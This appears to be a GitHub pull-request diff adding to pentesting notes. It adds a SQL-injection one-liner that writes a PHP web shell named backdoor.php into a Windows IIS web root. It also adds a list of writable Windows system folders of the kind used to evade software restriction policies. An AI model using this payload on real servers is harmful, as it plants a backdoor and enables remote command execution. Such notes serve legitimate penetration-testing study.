Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
5 changes: 5 additions & 0 deletions General/Shells.md
Original file line number Diff line number Diff line change
Expand Up @@ -846,6 +846,11 @@ Injection: Verified!
Press [Enter] to continue...
```

###### SQL Database
RCE upload through a SQL injection on a Windows Web Server
```
'; select "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE 'C:/Inetpub/wwwroot/backdoor.php';#
```
###### Ebowla

### WinRM
22 changes: 22 additions & 0 deletions Windows/1-Overview.md
Original file line number Diff line number Diff line change
Expand Up @@ -26,3 +26,25 @@ Releases:
| 6.2 | 9200 | Windows 8 <br/> Windows Server 2012 |
| **6.3** | **9600** | Windows 8.1 <br/> **Windows Server 2012 R2** |
| **10.0** | 10240 (TH1) / 10586 (TH2) <br/> 14393 (RS1) / 15063 (RS2) / 16299 (RS3) / 17134 (RS4) / 17763 (RS5) | Windows 10 <br/> Windows Server 2016 |

---------------------------------------------------------------------------------------------------------------------------

### SRP: Protecting Windows Folder in Windows 10
List of Windows writable path :
```
C:\Windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\drivers\color
C:\Windows\System32\Tasks
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks
C:\Windows\Tasks
C:\Windows\Temp
```

[Source](https://malwaretips.com/threads/srp-protecting-windows-folder-in-windows-10.80283/)